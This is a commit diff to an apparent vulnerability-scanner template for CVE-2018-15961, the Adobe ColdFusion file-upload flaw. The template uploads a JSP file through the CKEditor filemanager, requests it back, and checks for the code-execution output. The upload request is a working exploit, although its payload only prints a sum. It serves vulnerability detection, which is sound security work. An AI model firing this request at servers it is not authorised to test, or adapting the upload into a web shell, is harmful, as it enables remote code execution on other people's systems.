Update CVE-2018-15961.yaml

patch-1
Prince Chaddha 2021-11-11 11:51:24 +05:30 committed by GitHub
parent 8f8888481d
commit 6b896965a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 5 deletions

View File

@ -4,7 +4,10 @@ info:
name: CVE-2018-15961
author: SkyLark-Lab,ImNightmaree
severity: critical
tags: server,cve,cve2018,rce,coldfusion,fileupload
reference:
- https://github.com/vah13/CVE-2018-15961
- https://www.cvedetails.com/cve/CVE-2018-15961/
tags: adobe,cve,cve2018,rce,coldfusion,fileupload
requests:
- raw:
@ -14,15 +17,16 @@ requests:
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
%%%%%%%%
<%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%>
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
{{randstr}}
{{randstr}}.jsp
-----------------------------24464570528145--
- method: GET
path:
- "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"
@ -31,8 +35,10 @@ requests:
matchers:
- type: word
part: body
words:
- "{{randstr}}"
- "18188751"
- type: status
status:
- 200